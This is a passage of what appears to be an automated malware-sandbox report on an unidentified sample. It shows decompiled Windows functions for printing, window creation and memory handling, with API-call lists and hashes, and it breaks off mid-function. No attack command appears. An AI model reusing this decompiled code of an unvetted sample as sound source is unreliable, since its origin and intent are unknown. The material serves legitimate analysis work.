                                                                                                                                                                                                                                                                                          • StartDocA.GDI32(00000000,?), ref: 000F65C7
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 000F65D5
                                                                                                                                                                                                                                                                                          • ResetDCA.GDI32(00000000,00000000,?,?,1F9A9BDF), ref: 000F6626
                                                                                                                                                                                                                                                                                          • StartPage.GDI32(00000000), ref: 000F662D
                                                                                                                                                                                                                                                                                          • EndPage.GDI32(00000000), ref: 000F6660
                                                                                                                                                                                                                                                                                          • AbortDoc.GDI32(00000000), ref: 000F668C
                                                                                                                                                                                                                                                                                          • EndDoc.GDI32(00000000), ref: 000F6694
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 000F66A2
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: DeletePageStart$AbortCreateReset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 843537941-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c95aa711cb8360f57dc8753aab7f392364292e0c922dd97e4a0a32bea0a7b3e5
                                                                                                                                                                                                                                                                                          • Instruction ID: 398771e27e23a36e0b5d643e92a4be6016b109a9337148e01a55295fa811329e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c95aa711cb8360f57dc8753aab7f392364292e0c922dd97e4a0a32bea0a7b3e5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97415875A00A08AFD714DF64C984E7AB7F9FF8DB04B10854DE95A87B61CB72AC41CB60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                          			E00104510(struct HMENU__* __eax, signed short __ebx, void* __esi, struct HWND__* _a4, int* _a8, CHAR* _a12, signed int _a16, long _a20, struct HMENU__* _a24) {
                                                                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t31;
                                                                                                                                                                                                                                                                                          				int* _t33;
                                                                                                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                                                                                                          				signed short _t39;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t45;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t49;
                                                                                                                                                                                                                                                                                          				struct HMENU__** _t57;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t58;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t39 = __ebx;
                                                                                                                                                                                                                                                                                          				_t49 = __eax;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(__eax + 0x34)) != 0) {
                                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                                          					_t27 =  *(_t49 + 0x34);
                                                                                                                                                                                                                                                                                          					 *_t27 = 0x42444c7;
                                                                                                                                                                                                                                                                                          					 *(_t27 + 4) = 0;
                                                                                                                                                                                                                                                                                          					 *((char*)(_t27 + 8)) = 0xe9;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t27 + 9)) = 0xfffffff3 - _t27;
                                                                                                                                                                                                                                                                                          					FlushInstructionCache(GetCurrentProcess(), _t27, 0xd);
                                                                                                                                                                                                                                                                                          					if(_t39 == 0) {
                                                                                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t57 = _t49 + 0x28;
                                                                                                                                                                                                                                                                                          						if(_t57 == 0 || _t49 == 0) {
                                                                                                                                                                                                                                                                                          							RaiseException(0xc0000005, 1, 0, 0);
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							asm("int3");
                                                                                                                                                                                                                                                                                          							_t31 =  *_t57;
                                                                                                                                                                                                                                                                                          							_push(_t49);
                                                                                                                                                                                                                                                                                          							if(_t31 != 0) {
                                                                                                                                                                                                                                                                                          								_t31 = E00105DE2(_t31);
                                                                                                                                                                                                                                                                                          								 *_t57 = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t57[2] = 0;
                                                                                                                                                                                                                                                                                          							_t57[1] = 0;
                                                                                                                                                                                                                                                                                          							return _t31;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *_t57 = _t49;
                                                                                                                                                                                                                                                                                          							_t57[1] = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          							EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          							_t45 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          							_t57[2] = _t45;
                                                                                                                                                                                                                                                                                          							 *0x170c80 = _t57;
                                                                                                                                                                                                                                                                                          							LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          							_t58 = _a24;
                                                                                                                                                                                                                                                                                          							if(_t58 == 0 && (_a16 & 0x40000000) != 0) {
                                                                                                                                                                                                                                                                                          								_t58 = _t49;
                                                                                                                                                                                                                                                                                          								_a24 = _t58;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t33 = _a8;
                                                                                                                                                                                                                                                                                          							if(_t33 == 0) {
                                                                                                                                                                                                                                                                                          								_t33 = 0x15ad10;
                                                                                                                                                                                                                                                                                          								_a8 = 0x15ad10;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t17 =  &(_t33[1]); // 0x80000000
                                                                                                                                                                                                                                                                                          							_t19 =  &(_t33[3]); // 0x0
                                                                                                                                                                                                                                                                                          							_t20 =  &(_t33[2]); // 0x0
                                                                                                                                                                                                                                                                                          							return CreateWindowExA(_a20, _t39 & 0x0000ffff, _a12, _a16,  *_t33,  *_t17,  *_t20 -  *_t33,  *_t19 -  *_t17, _a4, _t58,  *0x170c08, 0);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t38 = E001057B1();
                                                                                                                                                                                                                                                                                          					 *(_t49 + 0x34) = _t38;
                                                                                                                                                                                                                                                                                          					if(_t38 == 0) {
                                                                                                                                                                                                                                                                                          						SetLastError(0xe);
                                                                                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L2;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x00104510
                                                                                                                                                                                                                                                                                          0x00104515
                                                                                                                                                                                                                                                                                          0x0010451b
                                                                                                                                                                                                                                                                                          0x0010452d
                                                                                                                                                                                                                                                                                          0x0010452d
                                                                                                                                                                                                                                                                                          0x0010453a
                                                                                                                                                                                                                                                                                          0x00104540
                                                                                                                                                                                                                                                                                          0x00104547
                                                                                                                                                                                                                                                                                          0x0010454b
                                                                                                                                                                                                                                                                                          0x00104555
                                                                                                                                                                                                                                                                                          0x0010455e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00104564
                                                                                                                                                                                                                                                                                          0x00104564
                                                                                                                                                                                                                                                                                          0x00104569
                                                                                                                                                                                                                                                                                          0x00104623
                                                                                                                                                                                                                                                                                          0x00104629
                                                                                                                                                                                                                                                                                          0x0010462a
                                                                                                                                                                                                                                                                                          0x0010462b
                                                                                                                                                                                                                                                                                          0x0010462c
                                                                                                                                                                                                                                                                                          0x0010462d
                                                                                                                                                                                                                                                                                          0x0010462e
                                                                                                                                                                                                                                                                                          0x0010462f
                                                                                                                                                                                                                                                                                          0x00104630
                                                                                                                                                                                                                                                                                          0x00104632
                                                                                                                                                                                                                                                                                          0x00104637
                                                                                                                                                                                                                                                                                          0x0010463a
                                                                                                                                                                                                                                                                                          0x00104642
                                                                                                                                                                                                                                                                                          0x00104642
                                                                                                                                                                                                                                                                                          0x00104644
                                                                                                                                                                                                                                                                                          0x00104647
                                                                                                                                                                                                                                                                                          0x0010464b
                                                                                                                                                                                                                                                                                          0x00104577
                                                                                                                                                                                                                                                                                          0x00104577
                                                                                                                                                                                                                                                                                          0x00104584
                                                                                                                                                                                                                                                                                          0x00104587
                                                                                                                                                                                                                                                                                          0x0010458d
                                                                                                                                                                                                                                                                                          0x00104593
                                                                                                                                                                                                                                                                                          0x0010459b
                                                                                                                                                                                                                                                                                          0x001045a1
                                                                                                                                                                                                                                                                                          0x001045a7
                                                                                                                                                                                                                                                                                          0x001045ac
                                                                                                                                                                                                                                                                                          0x001045b7
                                                                                                                                                                                                                                                                                          0x001045b9
                                                                                                                                                                                                                                                                                          0x001045b9
                                                                                                                                                                                                                                                                                          0x001045bc
                                                                                                                                                                                                                                                                                          0x001045c1
                                                                                                                                                                                                                                                                                          0x001045c3
                                                                                                                                                                                                                                                                                          0x001045c8
                                                                                                                                                                                                                                                                                          0x001045c8
                                                                                                                                                                                                                                                                                          0x001045d1
                                                                                                                                                                                                                                                                                          0x001045de
                                                                                                                                                                                                                                                                                          0x001045e1
                                                                                                                                                                                                                                                                                          0x00104605
                                                                                                                                                                                                                                                                                          0x00104605
                                                                                                                                                                                                                                                                                          0x00104569
                                                                                                                                                                                                                                                                                          0x0010451d
                                                                                                                                                                                                                                                                                          0x0010451d
                                                                                                                                                                                                                                                                                          0x00104522
                                                                                                                                                                                                                                                                                          0x00104527
                                                                                                                                                                                                                                                                                          0x0010460a
                                                                                                                                                                                                                                                                                          0x00104610
                                                                                                                                                                                                                                                                                          0x00104615
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00104527

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,0000000D,?,?,?,000F7D5F,?,0015AD10,00000000,5600184C,00000000,00000000), ref: 0010454E
                                                                                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,?,000F7D5F,?,0015AD10,00000000,5600184C,00000000,00000000), ref: 00104555
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00104579
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68,?,?,000F7D5F,?,0015AD10,00000000,5600184C,00000000,00000000), ref: 00104587
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68,?,?,000F7D5F,?,0015AD10,00000000,5600184C,00000000,00000000), ref: 001045A1
                                                                                                                                                                                                                                                                                          • CreateWindowExA.USER32 ref: 001045FC
                                                                                                                                                                                                                                                                                            • Part of subcall function 001057B1: GetProcessHeap.KERNEL32(00000000,0000000D,00000000,00000000,00104307), ref: 00105735
                                                                                                                                                                                                                                                                                            • Part of subcall function 001057B1: HeapAlloc.KERNEL32(00000000), ref: 0010573C
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E,?,?,?,000F7D5F,?,0015AD10,00000000,5600184C,00000000,00000000), ref: 0010460A
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,?,?,000F7D5F,?,0015AD10,00000000,5600184C,00000000,00000000), ref: 00104623
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105DE2: HeapFree.KERNEL32(00000000,00000000,?,0010755E,00000000,?,?,00107A12,001063ED,?,?,?,000F1339,80070057), ref: 00105DF8
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105DE2: GetLastError.KERNEL32(00000000,?,0010755E,00000000,?,?,00107A12,001063ED,?,?,?,000F1339,80070057), ref: 00105E0A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Heap$CriticalCurrentErrorLastProcessSection$AllocCacheCreateEnterExceptionFlushFreeInstructionLeaveRaiseThreadWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1167118205-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2b2e7dd8dfcb34ff37d902a227bab9d4ea5f3eed7987ca51e1140233333d6c0f
                                                                                                                                                                                                                                                                                          • Instruction ID: e3729981ac4e367bd26e66b126d6cb917412da0c1f515d62a29bef6d0b1abd9d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b2e7dd8dfcb34ff37d902a227bab9d4ea5f3eed7987ca51e1140233333d6c0f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E31A0B1A00601AFD7119F65DD48B6A77A8FF89720F158219F9499B690C7B0E880CBA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                          			E000FC710(intOrPtr* __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				CHAR** _v24;
                                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t48;
                                                                                                                                                                                                                                                                                          				CHAR* _t51;
                                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                                          				intOrPtr _t69;
                                                                                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                                                                                          				CHAR* _t72;
                                                                                                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F2F0);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t26 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t26 ^ _t73);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t48 = __ecx;
                                                                                                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				_t69 =  *__ecx;
                                                                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                                                                          				E001062C2();
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_t31 = E00101970(_t69, _t60,  &_v24);
                                                                                                                                                                                                                                                                                          				_t76 = _t74 - 0xc + 8;
                                                                                                                                                                                                                                                                                          				if(_t31 == 0) {
                                                                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                                                                          					E001062C2();
                                                                                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                                                                                          					_t33 = E00101A30( *_t48,  &_v20,  &_v20);
                                                                                                                                                                                                                                                                                          					_t76 = _t76 + 8;
                                                                                                                                                                                                                                                                                          					if(_t33 == 0) {
                                                                                                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t51 =  *(_v20 + 4);
                                                                                                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t51 =  *_v24;
                                                                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                                                                          					if(_t51 != 0) {
                                                                                                                                                                                                                                                                                          						_t14 = lstrlenA(_t51) + 9; // 0x9
                                                                                                                                                                                                                                                                                          						_t66 = _t14;
                                                                                                                                                                                                                                                                                          						_t40 = GlobalAlloc(2, _t14);
                                                                                                                                                                                                                                                                                          						_v28 = _t40;
                                                                                                                                                                                                                                                                                          						_t71 = GlobalLock(_t40);
                                                                                                                                                                                                                                                                                          						if(_t71 != 0) {
                                                                                                                                                                                                                                                                                          							E00106820(_t71, 0, _t66);
                                                                                                                                                                                                                                                                                          							_t76 = _t76 + 0xc;
                                                                                                                                                                                                                                                                                          							 *((short*)(_t71 + 2)) = 8;
                                                                                                                                                                                                                                                                                          							_t72 = _t71 + 8;
                                                                                                                                                                                                                                                                                          							_t17 = lstrlenA(_t51) + 1; // 0x1
                                                                                                                                                                                                                                                                                          							if(_t17 > lstrlenA(_t51)) {
                                                                                                                                                                                                                                                                                          								lstrcpyA(_t72, _t51);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							GlobalUnlock(_v28);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					_push(_v20);
                                                                                                                                                                                                                                                                                          					E001062C2();
                                                                                                                                                                                                                                                                                          					_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                          					_push(_v24);
                                                                                                                                                                                                                                                                                          					E001062C2();
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					return _v28;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x000fc713
                                                                                                                                                                                                                                                                                          0x000fc715
                                                                                                                                                                                                                                                                                          0x000fc720
                                                                                                                                                                                                                                                                                          0x000fc727
                                                                                                                                                                                                                                                                                          0x000fc72e
                                                                                                                                                                                                                                                                                          0x000fc732
                                                                                                                                                                                                                                                                                          0x000fc738
                                                                                                                                                                                                                                                                                          0x000fc73c
                                                                                                                                                                                                                                                                                          0x000fc73f
                                                                                                                                                                                                                                                                                          0x000fc742
                                                                                                                                                                                                                                                                                          0x000fc745
                                                                                                                                                                                                                                                                                          0x000fc748
                                                                                                                                                                                                                                                                                          0x000fc74c
                                                                                                                                                                                                                                                                                          0x000fc74e
                                                                                                                                                                                                                                                                                          0x000fc74f
                                                                                                                                                                                                                                                                                          0x000fc75a
                                                                                                                                                                                                                                                                                          0x000fc75d
                                                                                                                                                                                                                                                                                          0x000fc762
                                                                                                                                                                                                                                                                                          0x000fc767
                                                                                                                                                                                                                                                                                          0x000fc772
                                                                                                                                                                                                                                                                                          0x000fc773
                                                                                                                                                                                                                                                                                          0x000fc77e
                                                                                                                                                                                                                                                                                          0x000fc781
                                                                                                                                                                                                                                                                                          0x000fc786
                                                                                                                                                                                                                                                                                          0x000fc78b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fc790
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fc769
                                                                                                                                                                                                                                                                                          0x000fc76c
                                                                                                                                                                                                                                                                                          0x000fc793
                                                                                                                                                                                                                                                                                          0x000fc795
                                                                                                                                                                                                                                                                                          0x000fc79e
                                                                                                                                                                                                                                                                                          0x000fc79e
                                                                                                                                                                                                                                                                                          0x000fc7a4
                                                                                                                                                                                                                                                                                          0x000fc7ab
                                                                                                                                                                                                                                                                                          0x000fc7b4
                                                                                                                                                                                                                                                                                          0x000fc7b8
                                                                                                                                                                                                                                                                                          0x000fc7be
                                                                                                                                                                                                                                                                                          0x000fc7c8
                                                                                                                                                                                                                                                                                          0x000fc7cb
                                                                                                                                                                                                                                                                                          0x000fc7d0
                                                                                                                                                                                                                                                                                          0x000fc7d9
                                                                                                                                                                                                                                                                                          0x000fc7e4
                                                                                                                                                                                                                                                                                          0x000fc7e8
                                                                                                                                                                                                                                                                                          0x000fc7e8
                                                                                                                                                                                                                                                                                          0x000fc7f2
                                                                                                                                                                                                                                                                                          0x000fc7f2
                                                                                                                                                                                                                                                                                          0x000fc7b8
                                                                                                                                                                                                                                                                                          0x000fc7f8
                                                                                                                                                                                                                                                                                          0x000fc7f8
                                                                                                                                                                                                                                                                                          0x000fc7ff
                                                                                                                                                                                                                                                                                          0x000fc800
                                                                                                                                                                                                                                                                                          0x000fc805
                                                                                                                                                                                                                                                                                          0x000fc80f
                                                                                                                                                                                                                                                                                          0x000fc810
                                                                                                                                                                                                                                                                                          0x000fc81e
                                                                                                                                                                                                                                                                                          0x000fc82c
                                                                                                                                                                                                                                                                                          0x000fc82c

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00101970: GetPrinterA.WINSPOOL.DRV(?,00000005,00000000,00000000,?,1F9A9BDF,00000000,?,00000000,00000000), ref: 001019B4
                                                                                                                                                                                                                                                                                            • Part of subcall function 00101970: _memset.LIBCMT ref: 001019DD
                                                                                                                                                                                                                                                                                            • Part of subcall function 00101970: GetPrinterA.WINSPOOL.DRV(?,00000005,00000000,?,?,?,?,?,00000000,00000000), ref: 001019F1
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?), ref: 000FC798
                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000009,?,?,?), ref: 000FC7A4
                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 000FC7AE
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FC7BE
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 000FC7D2
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 000FC7DC
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 000FC7E8
                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?), ref: 000FC7F2
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Globallstrlen$Printer_memset$AllocLockUnlocklstrcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 91049717-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d80de0b6979619586564d250d3085c4c5447d297cbc19ba1999bc27c9043bf50
                                                                                                                                                                                                                                                                                          • Instruction ID: e87931fba32bcfbf798648fcf3f8a424c87a4f6b8738cc6608af48d9e342e170
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d80de0b6979619586564d250d3085c4c5447d297cbc19ba1999bc27c9043bf50
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B631C371E00209EBCB00EFA4DD89EBEFBB9FF49300F104519F905A7691DBB55A048BA1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                          			E000FAA92() {
                                                                                                                                                                                                                                                                                          				long _t62;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t64;
                                                                                                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                                                                                                          				int _t74;
                                                                                                                                                                                                                                                                                          				int _t77;
                                                                                                                                                                                                                                                                                          				intOrPtr _t80;
                                                                                                                                                                                                                                                                                          				long _t81;
                                                                                                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                                                                                                          				void* _t88;
                                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t115;
                                                                                                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t117;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t118;
                                                                                                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                                                                                                          				void* _t120;
                                                                                                                                                                                                                                                                                          				long _t121;
                                                                                                                                                                                                                                                                                          				signed int _t122;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t118 =  *((intOrPtr*)(_t122 - 0x2b4));
                                                                                                                                                                                                                                                                                          				_t87 =  *(_t122 - 0x2b8);
                                                                                                                                                                                                                                                                                          				_t62 =  *(_t87 + 0x28);
                                                                                                                                                                                                                                                                                          				if(_t62 != 0) {
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t122 - 0x2b0)) = _t122 - 0x2ac;
                                                                                                                                                                                                                                                                                          					 *_t62 =  *_t118;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t62 + 4)) =  *((intOrPtr*)(_t118 + 4));
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t62 + 8)) =  *((intOrPtr*)(_t118 + 8));
                                                                                                                                                                                                                                                                                          					_t64 =  *(_t87 + 4);
                                                                                                                                                                                                                                                                                          					 *(_t122 - 0x2c4) = _t64;
                                                                                                                                                                                                                                                                                          					_t115 = GetDC(_t64);
                                                                                                                                                                                                                                                                                          					 *(_t122 - 0x2cc) = _t115;
                                                                                                                                                                                                                                                                                          					_t68 = SelectObject(_t115, SendMessageA( *(_t87 + 4), 0x31, 0, 0));
                                                                                                                                                                                                                                                                                          					_t116 = 0;
